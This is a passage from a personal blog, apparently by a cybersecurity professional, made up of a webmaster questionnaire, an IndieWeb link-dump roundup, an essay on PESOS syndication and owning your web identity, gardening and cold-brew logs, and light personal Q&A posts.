I have a few different layouts. Most of them are pretty similar but I have different layouts for different post types: posts vs. pages, there’s some special posts, etc…

E.g. a page vs. a scroll vs. a note vs. a standard blog post vs. my screams etc…

10. How confident are you with CSS?

Once you’ve reckoned with the horror that is CSS, can you claim confidence in anything within this reality?

11. Do you know how to correctly use <dl>?

I guess not.

12. What is your favourite HTML element?

sup. I also love <li>sts.

13. If you’re making a new web page from scratch, what is the first thing you do?

If it’s for a new site, I gotta get the domain of course. Coming up with, and then actually finding the perfect domain name is really hard in my experience. Once I have my domain in hand, I try to get a wireframe up first.

14. Do you know JavaScript?

Does anyone? I know enough to get in trouble.

15. How about PHP?

The basics. Nothing less. Nothing more.

16. Does your website have a theme that you stick to?

Pretty much.

17. Are you more focused on content or design?

Content is probably the correct answer. Though I go through stretches where I am more keenly fixated on sprucing up the site’s design / aesthetic / ux / etc…

18. Do you own a domain name? If not, would you ever want to?

Yes! Many. Though shellsharks.com is probably the only one I am really using right now.

19. What do you think of nostalgia-focused or “retro” websites?

Love ‘em 🧡

20. Is your HTML valid? Do you even check?

Just checked this and I have 112 findings. So I guess not 😬.

21. What are your opinion on buttons and banners?

Love buttons. I have a bunch of them here. Banners are ok? I don’t like anything too visually distracting, and I certainly don’t like anything that is just an ad.

22. What do you think of button walls in particular?

I think they can be done tastefully (i.e. at the bottom of the page), and there’s lots of cool buttons to show off!

23. If you started over again, would you make something similar or completely different?

I’d make something similar for sure. But there’s a lot of things I would do better, or slightly different.

I’d comment my site’s source code a lot more.
There would be a lot less in-line JS and CSS.
In fact, I might try to make it JS-free.
I’d design with accessibility more in mind.
Though I’m on the fence with certain features, I might use an SSG or platform that would more easily allow for me to add federation capabilities, webmentions, and other IndieWeb functionality.
I have a lot of other ideas I might incorporate from the beginning too.

24. Are you envious of other people’s websites?

I wouldn’t say that, no. There are a lot of websites that I think are really cool though. They inspire me. Sometimes I steal good ideas when I see them. But I really like my website. I think it is unique, and in its sum, the best. It feels like home.

25. What text editor do you use?

Visual Studio Code.

26. Why do you use that one?

It’s cross-platform, I’m familiar with it, it has the Git functionality I want. I’m not super attached to it. But just haven’t tried other things.

27. Do you host your image files on your web server, or on another host?

Some of my images are in my GitHub repo, but most of them are in an AWS S3 bucket.

28. This might not be relevant to you, but what’s your opinion on the Neocities vs. Nekoweb debate?

Not aware of the debate. So no opinion.

29. How much server space would you estimate your main website takes up?

Not sure. I suppose I don’t really care.

30. Do you keep local backups of your files?

Yep!

31. Do you prefer simple or highly visual websites?

I see the beauty and merit in both. But have you seen my site? Very info-dense.

32. Do you stick to certain colours? Do you do that on purpose, or is it your subconscious?

I have some thematic colors to be sure, but I also have different themes (e.g. light/dark/classic) you can toggle through depending on your preference or mood.

33. Have you ever thought about quitting? Why?

The site? No. I go through drought periods where I am less active, but I’ve never considered shutting the site off or completely walking away. The nice thing about a personal website is you can be as active, or inactive as you want and come back when you please.

34. Do you have many webmaster friends, or is it a solitary hobby?

There are a lot of people I have met online in the IndieWeb community and via the Fediverse that have their own sites. We are friendly in a digital kinda way. IRL though I don’t know too many folks who have personal websites.

35. Do people in your real life know about your website?

They sure do.

36. Do you update your website very often? How often is “very often”?

I’d say my site is updated very frequently most of the time. These updates are typically small additions to some of the lists that I keep. When I am very active with the site you might also see multiple net new posts in a week.

37. And the overall design, do you change that much? Why or why not?

I’ve gone through a major design overhaul about every 2 years thus far.

38. Is your website more you-focused, hobby-focused, or outside world-focused?

It’s a bit of everything. I write about infosec, technology and “life in general”. I’ve given myself the space to write about whatever I want, from my professional pursuits to my personal life, and everything in between.

39. Do you do web design professionally?

Not at all.

40. If not, would you like to? And if you’re comfortable answering, what do you do for work?

At one point in time that was my dream. To work remotely + abroad and do web design / web building work. I never really went down that path in the end, opting instead for the cybersecurity field.

41. Do you communicate with people by email very much?

Occassionally. I do enjoy email correspondence, and try to contact IndieWeb folks from time to time via email just to chat.

42. Some people reject social media and use websites as a replacement. Do you keep social media outside of your website?

In a way, yes. My site isn’t “social”, in that it is not federated, it doesn’t support webmentions and there is no commenting system. I like what is on my site to be my content alone. But I write about social media a lot, link out to my social presences and even PESOS some social media content back into my site.

43. How about instant messengers? Do you use a mainstream one like Discord or Telegram? Or something like Matrix? Do you avoid them?

I do use them, but they don’t see much action day-to-day. I have and use Discord, Matrix and XMPP (shellsharks@xmpp.earth). I also have lots of traditional “text messaging”-type apps I use (e.g. Google Voice, WhatsApp, iMessage, etc…)

44. Do you listen to music while you work on websites? If so, what kinds of artists?

Sometimes. Just depends on my mood and what I’m doing. For some reason I can listen to music while reading, but not when I’m writing. I can listen to music while I code though. In these cases, I’ll mostly listen to instrumental versions of albums I like and metal.

45. Do you keep everything you make on one website, or do you have more than one?

Monolithic.

46. On a similar note, do you keep to one topic on your site, or many?

Any and all topics.

47. Do you present your real self, or at least try? Or do you construct a persona on purpose?

I pride myself on being genuine, both in my writing and in person.

48. Have you ever made a good friend thanks to your website?

Eh, I don’t know about that. But I have built a lot of cool relationships thanks to my site. So that’s neat!

49. Are you happy with the way HTML and CSS currently work?

I like the design and functionality of my site. But there’s A LOT I want to improve, some of which I need time to do, and in other cases I need to learn how to do it.

50. What are practices that you think people should avoid?

All these things. 😡

51. What about under-utilised practices, or things you think people should do more?

I don’t know if these are under-utilized per say, but here’s a bunch of things I recommend for folks to do while they are site building.

52. Do you use a lot of semantic HTML? Or are you guilty of generic structure?

I discovered the concept of semantic HTML somewhat recently, and certainly after the first few iterations of my site’s overall design. I’ve incorporated some semantic HTML since then, but it hasn’t yet permeated the entirety of the site’s bones.

53. Do you consider different browsers?

Consider? I use Chrome and Safari mostly.

54. Speaking of, what’s your preferred browser? Convince your readers why they should use it.

I use Safari on my personal computer and Chrome on the professional side.

55. And what OS are you on?

macOS.

56. Do you have a strong opinion on that, or do you just happen to use it?

I’m not a zealot or anything, but I love Mac and am not interested in anything else. Also, have you seen Windows lately? Complete dumpster fire. Aspirationally, I’d like to become a Linux user but in my few attempts to switch over I just haven’t found traction.

57. Are your websites mobile-friendly?

I think so. I’ve tried to make it so and done some testing. I have special mobile layouts too.

58. What are your thoughts on autoplay?

Don’t like.

59. What are your thoughts on webrings? Are you in any?

Love webrings! I’m in a bunch!

60. Do you have any web shrines? What do you like to see in that sort of page?

I’ve never considered any of my pages/posts a “web shrine”. But I do have some things maybe you could consider shrine-ey?

61. Are your websites “cliche”, in your opinion?

Nah.

62. What is your ideal website? Are you striving for that, or for something else?

Hmm… I’d say the “ideal” website has…

Unique design / some unique characteristics. Whimsy
A mix of content types (e.g. personal journals, niche/technical posts, link dumps, etc…)
Search capability
As much of this stuff as you can throw in

My site has these things and is ideal for me.

63. Are you an artist? Do you draw or design your own assets?

Oh absolutely. Is it good art? Well, I’ll let you be the judge of that.

64. What are your favourite resource sites?

Not sure what this question means exactly. But I have a lot of IndieWeb resources I keep listed here.

65. Is there a habit you just can’t get away from no matter how hard you try?

Here’s a bunch of my writing mannerisms, some of which I try to get away from and others that are just unique to how I go about things.

66. What’s your biggest advice for a new webmaster?

Don’t worry about doing everything, or being perfect. Just add things little by little. Be yourself.

67. Do you keep all your styling in CSS? Or do you hard-code some?

Some of it is tucked away in CSS files, and unfortunately too much of it is still in-line.

68. What do you think of frameset layouts?

Don’t know much about ‘em.

69. How about table-based layouts?

Don’t know much about these either. I use a CSS grid kinda thing.

70. Do you subscribe to the ideas of “one-column”, “two-column” and “three-column” layouts? Do you use any of these?

Yes I like and use these in certain situations. My mobile layout is exclusively single-column. But as the device size gets bigger, you will see content start to spread across multiple columns, especially as it pertains to my home page. I like the idea of ToC’s and sidenotes populating side columns for post content too (though I haven’t gotten around to implementing this sort of thing yet).

71. Do you spend longer on the HTML or the CSS?

No idea. Probably the CSS though because it’s maddening.

72. Have you ever made a page with no CSS? It’s useful for your thoughts.

I have a number of .txt pages if that counts (e.g. humans.txt). Most of my site is styled though.

73. Do you ever find yourself making layouts with nothing to put on them? Or do you only make layouts when the need arises?

Don’t think I’ve ever made a layout I didn’t have something already in mind for.

74. Would you consider yourself a beginner? Or advanced? Somewhere in the middle?

In terms of having a site in-general, I’d say I’m upper-intermediate at this point. There are some aspects of site design / webmastering / site-building that I am still not so good at to be honest.

75. Do you have a habit of looking at the source code of websites you visit?

I wouldn’t say it’s a habit. But I do do it on occasion. It’s a good thing to do.

76. How did YOU learn how to make websites?

A long time ago I learned the old fashioned way, hand-jamming HTML tags directly into a notepad plaintext file. But in terms of my current site, I’ve learned kinda on-the-go. A mix of reading official documentation, W3schools, stack overflow, etc…

77. Do you ever force elements to do things they’re not supposed to?

Not sure. But I do use plenty of outdated HTML elements 😅.

78. Thoughts on floating elements?

Floating how? Like CSS floating things in one direction or not in a container? Or visually “floating” on page? Not sure how to answer this one.

79. When you’re sizing stuff, what do you use first? Do you use px, em, %, or something else?

Whatever works. All of the above.

80. Do you have a favourite font?

Not really. Maybe something in the Helvetica family?

81. Would you run a website with another person? How would that work?

Sure, for a project or something that we had a mutual interest in.

82. Do you surf the Web to find new personal websites very often?

Sometimes I’m very active in my surfing/exploring. Other times I’m not. My infosec sites, Scrolls and Linklog are a few examples of the product of this surfing though.

83. Do you bookmark other people’s websites? How would you feel knowing someone else bookmarked yours?

Yep! I bookmark them, subscribe via RSS, add to specific lists, etc… I love seeing when other people bookmark, reference, or add my site to theirs in some way too!

84. What do you want people to be most impressed with when they see your website?

Maybe these things?

85. Are you interested in technology outside of websites? Do you collect?

Yep. I’ve always been into Apple, desk setups, infosec, computing-in-general, that sorta thing. Can’t say I really have any tech-related collections.

86. How often and for how long are you online?

Too much. Basically all day except for when I’m at the gym, sleeping, or spending time with the family.

87. When it comes to your website, who is your target audience?

Everyone. I write about infosec, technology and life-in-general.

88. Have you ever been interested in XHTML?

Not specifically, no.

89. Do you program in general? Have you ever written a program for use with or on your website, not counting simple JavaScript?

I don’t have any “programs” on my site (unless you count some shoddy JS code as a “program”). I can program, but mostly have simple JS and Liquid stuff on the site.

90. Speaking of programs that help you make websites, what do you think of static site generators (SSGs)? Have you ever used one?

Yes. Love! I use Jekyll. 🧡

91. Do you keep a hitcounter? Why or why not?

No. Don’t care. I’m more interested in people directly messaging me.

92. Do you frequent forums? Which ones?

Not THAT frequently. But I am a patron of infosec.pub and 32-Bit Cafe.

93. Do you write your page content directly into the editor, or do you prepare it elsewhere, like a text document or a Word document?

I use VSCode and git. Here’s some other how-I-do-things-related docs…

94. Do you think you appear cool to others? A more accurate answer now: do other people ever say you’re cool?

I’m sure there’s someone out there who thinks the things I do are cool. Or maybe it’s just me.

95. Are you embarrassed of your old work? Have you ever deleted everything out of shame?

Nah. If there is any of my old work that I don’t like though I tend to update it, so that keeps the embarassing stuff to a minimum.

96. Would you close down your website if you couldn’t update it, or would you leave an archive?

I’d like to have my site available indefinitely.

97. Do you reveal a lot about yourself on your website? Or are you more secretive?

I’m relatively open book. I don’t put a lot of pictures of myself but I do post a fair bit about what I’m up to personally.

98. Are you willing to reveal who your best online friend is, and/or if they have a website?

I don’t think I have an online-specific “best friend”. I’ve started to build some friendlier online relationships thanks to projects like Scrolls though.

99. And do you optimise the images on your website?

I don’t really. Most of my images are stored in an S3 bucket and pulled in from there.

100. We’re out of time! How do you feel after answering 100 questions? ….other than exhausted.

It’s a lot! But once you get in the groove of things you can answer 100 questions pretty quickly.

Link Dumps

Thu, 29 Jan 2026 11:05:00 -0500

I love the IndieWeb 🧡. For a lot of reasons—but one thing I particularly enjoy (as I’ve mentioned here and here for example) is the practice of “link-dumping”. Links are great, and in a world where search engines have just become essentially AI summary slop machines, having real, hard links to actual websites made by humans is a valuable thing. But discovery is tough. Singularly finding NON-AI slopsites is an exercise in itself. But collectively, we can make surfing easier and dare I say, kinda fun again?

This brings me back to this concept of link dumps. It’s easy enough to understand—all it is, is where you put a bunch of links to other things on the web and publish/share it (typically on your own site, but honestly could work in a social media setting too). Done! Sharing links is a great way to strengthen the interconnected “web” of the Internet, lessen reliance on big tech “search” (heavy sarcasm here) engines, boost other creators work, build community, and discover awesome people and things on the web. Who wouldn’t like that!?

A few things to note about what makes a link dump. It just needs to be a bunch of links. Easy. It doesn’t HAVE to be published weekly or at any set cadence and it can really just be in a list or, if you want, could have more narrative style to it. So, here we go! Below is a link dump of link dumps! Happy surfin’ 🤙

Link Dump List

A list of link dumps from cool indieweb folks (in no real particular order).

Good links from Sophie
weeknotes from Joel
Link Dump from Kai
in Review from axxuy
weeknotes from Felix
Weeknotes from Burgeon Lab
Weekly Recap from Steven
Weekly Notes from Thejesh
Weeknotes from Jochen and Katharina
Links from Michael
Weeknotes from anh
Week Notes from Kerri
Weekly link dump from Dominik
Weeknotes from Tracy
Miscellanea from Les
Week Note from tahimik
week notes from eli
Monthly Notes from Zoe
Links list from Andrea
Link Blog from Abhinav
Link Dump from Paul
Link Blog from Elizabeth
Linkdump from Andreas
A Gathering of Links from Britt
Scraps by Fyr
Links from MOULE
weeknotes from Thom
Personal web finds from Ruben
Bookmark Beat from Dani
Web Excursions from Brett
Weeknotes from Michael
The Index from Piccalilli
Littlebits from Adam
Weeknotes from Benjamin
Weeknotes from Robb
Bookmark Beat from Dani
Scrolls from me! Shellsharks (I also have my Linklog)

If you’ve got your own link dump or link log thingy you want added to this list feel free to reach out!

Canonicalize Your Web Identity and Achieve Data Sovereignty with PESOS

Wed, 21 Jan 2026 12:35:00 -0500

Who are you on the web? Are you what your Linkedin says you are? Or your Facebook? What about Instagram? Mastodon? TikTok? Reddit? You probably wouldn’t say any one of those is really you. Each of these represent only a fraction of our collective self on the Internet, none of them truly embodying our real, complete personage as we want it known. We rent these spaces to share our fractured selves, but we don’t actually own our identities, our words or our relationships. They are locked inside each of the individual silos, for the gain of corporations, not for the welfare of we the people who give those spaces life and value.

To combat this digital decay, we have the IndieWeb, a movement engineered to reclaim our created content, establish more resilient communities and control exactly how and what we want to share with the world. The IndieWeb isn’t universal though, and it lacks some of the social capabilities we’ve come to know and enjoy that these other platforms possess. How can we reconcile the notion of using the IndieWeb as our singular, canonical point-of-presence on the Internet while also continuing to subordinate and store our content in the traditional, corporate-owned platforms? One answer, is PESOS.

PESOS is an acronym for Publish Elsewhere, Syndicate (to your) Own Site. It’s a syndication model where publishing starts by posting to a 3rd-party platform, then using infrastructure (e.g. feeds, Micropub, webhooks), create an archive copy on your site. ¹

Similar to PESOS (but in reverse), the IndieWeb community also espouses a similar syndication model, POSSE—which is the practice of posting content on your own site first, then publishing copies or sharing links to third parties. ²

NOTE: In practice, though POSSE may be more IndieWeb-forward, I think it is a less realistic and less-useful model as it does not allow you to fully exist inside the social communities you are interacting with. Rather, you are posting things natively to your site and having that content forklifted to various services across the Internet. This content often doesn't respect the nuanced manner and specific contexts in which you are expected to post (e.g. character limits, hashtags, @handles, etc...). For this reason, we'll primarily discuss PESOS.

PESOS when coupled with an IndieWeb presence, is a simple model which allows us to achieve data soverignty, optimally curate how we express ourselves, and establish a canonical presence for ourselves on the web. Since we are archiving content back to our own site, we can own it outright. Since we choose what we want to archive, and exactly how it is displayed, we are free to be exactly who we want to be. And since everything is going to a singular spot, that you own, it can be a permanent place for anyone to find you, in perpetuity.

If you’re looking for further inspiration and examples of this in action, check out the following sites which have done an awesome job bringing PESOS to life!

This all sounds great right? But how exactly do we do this…

How to PESOS

Some things are easier said than done, and with PESOS, this is true in many ways. There are a few things to consider when you are architecting a PESOS-driven syndication / archival strategy.

Ensure you have a repository (i.e. a website) that you own for everything to go to
Understand what exactly you want to archive
Will you archive content in a manual or automation fashion?
Acquire tooling/technology to perform archival / syndication

Own Your Website, Own Your Data

To not fall into the same content ownership trap that we’ve traditionally had with centralized platforms, it is important that the site you use, the one you are “PESOS-ing” to, is one that you own. Ownership in this context means…

You purchase and are able to use a custom domain name
You have some level of access to all your content (e.g. backups of all your posts and other relevant data/files)

There are site/blog-hosting platforms out there that offer one-of, but not both of these qualities.

For example, consider a platform where you retain access to your data, but your site exists under a subdomain of the larger parent company (e.g. “shellsharks.medium.com”). If you ever decided to leave this platform, or the platform disappears, or enshittifies, you may retain your content, but your identity disappears with it. Similarly, consider a platform where you can bring your own domain name, but your content is locked away in some proprietary CMS. If you don’t take precautionary measures to keep regular backups of your content, you could lose that content completely in the event of service closure, or merely at the whims of the provider.

Only with both of these criteria can you resiliently port your data and identity to different web hosts and blogging platforms, retaining ownership of your data, and not losing the all-so-important pointer to your self on the web (i.e. your domain name).

Speaking of data ownership, let’s discuss what’s important to you…

What Should You Archive?

Do you want to bring everything you post elsewhere on the Internet back to your site? What does everything even mean? Replies, boosts, likes, posts—everything? Maybe you do. I know I don’t. It’s just something you need to decide for yourself, based on what’s important for you to archive, what you want to have exposed on your site, and what you think you’ll want in the future.

I for example, was not interested in archiving a lot of my social interactions. I don’t care to bring back “likes”, or “boosts/reposts”. Even the overwhelming majority of my “reply posts” are not something I care to keep long term—they serve no useful purpose as reference material, and in most cases are just li’l blurbs like “heya! 👋”. Not exactly worth retaining a copy of every instance of this. Even a lot of my regular, original “posts” are not worth keeping as they are either me manually syndicating (POSSE-style) something I’ve published first on my site, or they are simply (and pardon my french) shitposts. I don’t need these things permalinked on my site.

Once you’ve got the general idea of what you want to archive, you’ll be better informed as to how you plan to archive this content.

Manual and/or Automated Syndication

Whether to manually or automatically syndicate content to your site is as much a technological challenge as it is a philosophical question. For me, I prefer a more highly curated approach to what I share on my site. So I am hesitant to auto-publish content that originates across my Internet-of-platforms back to my site without either first reviewing / approving (and often enriching) it or unless their is robust logic in place which determines whether I would want it archived.

Once you’ve settled on an approach though, a new challenge is born. Manually archiving is very time consuming, and does not scale well. You have to either have A LOT of time on your hands (if you post a lot elsewhere), or just not have a lot you care to archive back. On the other hand, automatic syndication requires bespoke tooling & technology. Some combination of services or hosted-scripts that can be triggered to grab content from one place, transform it, and then put it on your site. Let’s talk about that tooling & technology.

Archival Tooling & Technology

There’s a lot of tools out there to archive your stuff. Not all of it works. Not all of it is compatible with the blogging / site platform you may have chosen. Not all of it will work with the services you are trying to extract content from. Some of the tech is only semi-automatic. You’ll have to do some research and cobble together what actually works to achieve the results you’ve decided you want.

If you’re on Mastodon (as I am), you may be interested in using the Mastodon Markdown Archive utility. It’s author, Gabriel explains how he uses it for archiving and syndicating Mastodon posts. In fact, I used this tool for my own Mastodon Auto-PESOS needs.

The IndieWeb is a thriving network of communities, and PESOS is not some nascent ideology. There’s a groundswell of people looking to reclaim their data and their identities. As such, there is a lot of tooling out there, already built, that you can find and use to archive your data, the PESOS-way.

The beauty of the IndieWeb, is that it’s all about you. Your data, your identity, your choice. You can choose to archive stuff, you could not! You can archive things and then delete them later. You can choose how your content looks, edit it, add to it, whatever! PESOS is the best of all worlds. You can continue to participate in the centralized platforms, for all their social utility, but remain fully in control of your data and your identity. Perfect!

References

Gardenlog: Blueberries, Blackberries, Oh My!

Mon, 23 Jun 2025 15:56:00 -0400

OK! Checking in now on all things garden-ey from the past few weeks…

Tomato Updates

The Cherokee Purple’s have really gotten tall! Some yellow flowers here and there but no sign of fruiting as of yet. Just gotta keep on waterin’ ‘em and see what they do. 🍅

Blueberries, Blackberries, Oh my!

After some serious snipping, I was able to remove all of the invasive honeysuckle that had managed to grow in-between the two blueberry bushes that it turns out I have on the side of my house. Between the two of them, there seemed to be 100’s of berries! They ripened at various times and it was a blast hand-picking them with the kids and eatin’ them on the spot. But it’s not just kids that like berries—birds and squirrels do too—and they came for them… So, I bought a little tulle to try and protect the berries (as shown below). Has it worked? Hard to say. I don’t think I did the best job wrapping the bushes to begin with so inevitably the little critters found their way in. Now I’ve just got one bush wrapped and I think it’s doin’ a decent job at this point. The other bush is just about picked clean.

Next to my blueberries, I’ve got this other berry plant. For a while I thought it was some kind of blackberry, but it could be a raspberry too perhaps? Take a look at the following two pictures and let me know what you think…

Either way, delicious berries are in my future. No complaints!

Other stuff

Here’s some other random things to report from the garden/yard…

My porch project is nearly done, and here’s the current status of my future garden bed location. It’s all clear of pavers! Some work will need to be done to dig it out from here and lay in some suitable soil. Haven’t decided what all I want to grow here, but I think some cucumbers for sure (amongst other things).

Also, as part of the larger future layout of my yard/gardening area, I’ve put in some infrastructure for a future potting bench that would sport a working sink. Cool!

I bought a pair of potted hydrangeas. Just waiting for some flowers now…

Finally, checking in on the wild blackerries I’ve got out back… the fruit is struggling a bit…

Until next time! 🧑‍🌾

Brewlog

Mon, 19 May 2025 10:10:00 -0400

A place for me to keep record of my (coffee) cold brews. I’m no coffee tasting expert, but will add some notes as I go! ☕️

Brew Logs

Time Bender

Roaster: Weird Brothers Coffee
Brew Date: 3/11/26
Tasting Notes: Was OK.

Stranger Beans

Roaster: Weird Brothers Coffee
Brew Date: 2/21/26
Tasting Notes: Loved it. Very flavorful and fresh. Need to get this one again.

Catoctin Coffee Company

Roaster: Catoctin Coffee Company
Brew Date: 6/19/25
Purchase Location: Trinity House Café
Tasting Notes: Not bad.

Loan Oak House Blend

Roaster: Loan Oak Coffee Co.
Variety: House Blend
Flavor Profile: Africa & Latin America- Sweet Cocoa, Brown Sugar, Smooth
Purchase Location: Blend Coffee Bar

Pushing Daisies

Roaster: Loan Oak Coffee Co.
Variety: Pushing Daisies
Flavor Profile: Fruity, Earthy, Floral
Brew Date: 6/6/25
Purchase Location: Blend Coffee Bar

Townsman

Roaster: Loan Oak Coffee Co.
Variety: Townsman
Flavor Profile: Mexico Chiapas- Dark Roast | Dark Chocolate, Molasses, Bold
Brew Date: 5/19/25
Purchase Date: 5/16/25
Purchase Location: Blend Coffee Bar
Tasting Notes: Very roasty and a bit bitter. Decent but not my favorite.

Brazil Natural Process Coffee

Roaster: Caffè Amouri
Variety: Brazil Natural Process Coffee
Flavor Profile: Dark Roast | Dark Chocolate, Almond, Orange Zest, Sweet & Clean
Brew Date: May 13, 2025
Purchase Date: May 12, 2025
Purchase Location: Ridgetop Coffee & Tea
Tasting Notes: I really liked this one.

* Will limit these logs to net new brews, rather than re-logging beans I have tried previously.

Beforetimes

I had some other beans before this but had not started this log yet. So some in these beforetimes will go unrecorded!

Gardenlog

Fri, 09 May 2025 16:36:00 -0400

It’s time. I’m gettin’ into gardening. Have I grown anything ever? Nope. Do I simply adore the taste of a garden-fresh tomato? 100%. So, as is my custom, I’m going to attempt to document the journey—to include all the successes, failures, and hopefully delicious moments along the way.

I don’t know what I’ll do with this “series” long-term. (Hopefully) if this whole gardening thing works out, I’ll have semi-routine posts about this sorta thing—but what format they will come in is TBD. Maybe they’ll just be regular “posts” (as this one is), or a recurring section in my “Captain’s Log”. Or maybe it’ll deserve its own collection type some time into the future. Rather than obsess over that now, I’m just going to make this post and see what it all grows into! (See what I did there? 🤭)

Gear Up

I’ve never had a garden before, and besides having a house plant here and there over the years, I’ve not really “grown” much of anything in my life. As such, at t=0 I didn’t have much gear to speak of—and as we all know of course, ya gotta have the right gear! So I picked up a few things from the hardware store. Here’s my new loadout…

Garden Trowel
Gardening Gloves
Potting Soil (more on what I’m planting in this soon)
Plant Cage (here’s a hint though…)

The Garden

My back yard is a bit of a mess and quite “in-flux” right now with the ongoing screened-porch build. There is a spot I’ve identified as a potentially ideal location for a “garden” in the future, but as of right now, it’s just not ready for ~~terraforming~~ garden-forming.

Instead, I will be using an existing planting area to house a few things for this season. It’s a good way for me to get a little practice in and can commit to something more long-term later this year or next “season” entirely. Here’s what that space looks like now. I need to dig up what’s there and get it ready for what I plan to plant!

What’s interesting, is there’s some chives and oregano already growing there. I suppose I can thank the previous owners of this house. Not sure whether I’ll keep those herbs there or just remove them to make way for what’s new.

Tomatoes! 🍅

Story time: I was a “Navy brat” growing up, and as such, lived in various places up and down the East Coast during my childhood. One constant throughout that time was visiting my grandparents (and other relatives) who lived in South Carolina (specifically, Charleston). I have very fond memories of those times. One standout element of those visits was always the food. My grandma made a lot of things that I only really ever had there–field peas, banana pudding, pound cake, this very particular sweet tea, her pancakes, etc… But one of my favorite things was always the tomatoes and cucumbers, fresh from the garden. You cannot get tomatoes like those at the store. In my experience, I can’t even get tomatoes that good at a farmers market around here. It’s not just nostalgia talkin’ either. I’ve recently had one of grandma’s tomatoes and it holds up. They’re delicious & entirely unmatched.

I like to eat just sliced tomatoes, with a bit of salt and pepper on them. I also like them on a BLT. Unsatisfied with my options at the store, I’ve long thought about growing my own. Up until recently, it wasn’t really an option for me as I didn’t have a place to grow them. However, since moving into a new place, I now have some space for a garden! So, the other day, I finally decided to get into it.

Turns out, I know nothing about gardening. I didn’t even really know much about tomatoes, aside from the fact that I like to eat them and the varieties at the store are kinda weak-sauce. So I started doin’ a bit of research and came across this article discussing the best tomato varieties. Ultimately, I decided to pick up some Cherokee Purple plants from the store.

Here they are in all their li’l sprouty splendor!

I’d love to blast out and immediately plant these babies, but from what I’ve read, maybe it’s not that simple? I’m still learning here, but I think I have a few things to consider before transplanting them to the chosen garden bed. First, I may need to harden them up a bit to get them ready for the outside world. Second, the forecast is pretty dreadful for tomatoes—who like water, but maybe not this much.

I’m goin’ to move these outside for a few hours each day to get them ready, but keep them inside to spare them from some of the heavier rain that I might be expecting.

In a week or so I’ll be back to chat prepping the space, installing the cages and transplanting. See ya! 👋

Planted!

Update! (5/16): They’re in!

Look at how beautiful it is! 🥹

Now to water, and maintain. I’ll check back in when I have something noteworthy to report!

Miscellaneous & Resources

Yeah, I made it Asparagus (hex code: #87a96b)
Almanac: How to Grow Tomato Plants: The Complete Guide & Hardening Guide
The Maker Makes Tomato Guide
Bonnie Plants Growing Tomatoes
Soil Temperature Guide for Tomatoes
Keeping Tomatoes Healthy in Wet Weather
GardenTech Tomato Guide

BQC: Ten Pointless Facts About Me

Fri, 02 May 2025 22:04:00 -0400

Here’s a blogging challenge kicked off by Forking Mad. Here’s 10 “pointless” questions, and their answers, from me!

Do you floss your teeth?

Yes. Though not as routinely as I used to. You see, some time ago I had my top-back-molars on both sides of my mouth pulled. They had long bothered me—I couldn’t eat much of anything without food getting stuck inbetween those teeth and the set in front of them. This would cause serious discomfort which I could alleviate by flossing said food out. This meant I flossed at least once, but likely multiple times each day. Since having those teeth pulled, food does not get stuck in my teeth in the same way, so my flossing habit has suffered a bit. I still floss most days though.

Tea, coffee, or water?

These days, coffee for sure. In fact, I’ve recently gotten into making my own cold brew. It’s delicious! I’ll normally have some coffee at least once, but usually twice a day (a cup in the morning and another sometime in the afternoon). My coffee habit only started during the pandemic though (oddly enough). Before that, I was a sweet tea person all the way. I can thank my southern roots for that I suppose. But unfortunately, all the sweet tea I was drinking back in those days started to cause me some health issues so I had to change course a bit. Coffee is magical though, so not a bad replacement ☕️ 😁.

I do drink a lot of water though, especially on days where I am at the gym (which is most days!)

Footwear preference?

I tried looking for the exact shoe, but perhaps they are no longer available? Anyways, my prefered shoe are these Salomon hiking shoes/boots (in black) that are kinda a hybrid “regular” hiking boot and sneaker. They are super comfortable, extremely versatile, waterproof, last forever and I like the way they look. I wear ‘em everywhere!

Favourite dessert?

This kinda depends on the situation—or my mood. Traditionally, my favorite dessert has been cheesecake. But I also love blueberry cobbler and rum cake. I have a rum cake every year for my birthday in fact 🎂.

I also really love tiramisu 🤤

The first thing you do when you wake up?

I usually roll over and go back to sleep for a few more minutes 😴. Then, probably pick up my phone and check some combination of Apple News, Fedi, Email and other notifications that came in over-night.

Age you’d like to stick at?

Well for all the usual reasons it’d be nice to have some of the qualities that came with youth (~mid-20’s)—back when I didn’t get sleepy after one beer, had no knee pain and could recover from anything in ~48 hours. But aside from that, aging hasn’t been so bad for me. It’s brought me new and exciting professional challenges, I’m a father to two cute little nuggets, I’m in the best physical shape I’ve ever been in… I dunno, things aren’t so bad at this age…

How many hats do you own?

Own? 6-10 maybe. How many do I actually wear? Well I’m not much of a hat guy, but I do have a sun hat-kinda thing I’ll bust out when doing yard work sometimes 🤷‍♂️. All my other hats are ones I’ve picked up at security conferences 😂.

Describe the last photo you took?

The last thing in my photos app is actually a video. It’s the cutest thing really. Whenever my daughter (she’s 1) wants a snack, she grabs it from the pantry and then excitedly runs over and brings it to me. After she hands it to over, she’ll do this rapid fire series of li’l baby jumps. The cute hoppy anticipation is just the best 🥰.

Worst TV show?

Big Bang Theory. Just awful. I won’t be taking questions.

As a child, what was your aspiration for adulthood?

From what I remember, I had a few “what do I want to be when I grow up” phases. (In no particular order)…

Astronaut
Archaeologist
Paleontologist
Doctor

I’m pretty sure all of these came after watching some relevant TV show or movie 😅.

Over/Under with Shellsharks

Mon, 21 Apr 2025 08:00:00 -0400

Here’s my submission to lazybea.rs series Over/Under. The idea is simple, Hyde gives me some topics and I state whether those things are overrated or underrated, with some text about why. Here were my chosen topics…

Indieweb
Slashpages
Sharks are dangerous
Ransomware
Octopus dishes

Go read this post over at lazybea.rs!

Over/Under with Shellsharks

IndieWeb

By most, the IndieWeb is severely underrated—by the enlightened few, consider it adequately-rated. It’s probably of no surprise to anyone who has followed my writing for the last two-ish years—I love the IndieWeb, and personal blogging in general. I frequently write on the subject, have built many-a-reference dedicated to collecting resources and educating others, and I somewhat recently started a “newsletter”-type thingy dubbed “Scrolls”, which heavily features content and personalities from across the IndieWeb. I love me some IndieWeb.

Slash Pages

Though I have to give all credit to Robb for the creation and maintenance of the venerable Slashpages.net, I can give myself a tiny nod as Robb did consult me prior to the site going live on what my thoughts were on how they should be defined and what pages should/could be included. He was even nice enough to give me a named credit on the site and include my silly /chipotle slash-page 🌶️ 😆.

Slash Pages are just fun. They are an emodiment of the IndieWeb experiment. They are meant to share something about you, the individual behind the site. They exist in a place (the root of your site) that should be relatively common across other IndieWeb sites—which leads to improved discoverability and a greater sense of community. They are also just quirky, silly and very human—something the web, and the world, desperately need more of.

In the weeks and months since Robb launched the site, I’ve noticed a really promising level of adoption across my own IndieWeb circles. I hope to see more people have fun with this idea, add Slash Pages to their site, come up with new ones, etc… For now, I believe it is still vastly underrated!

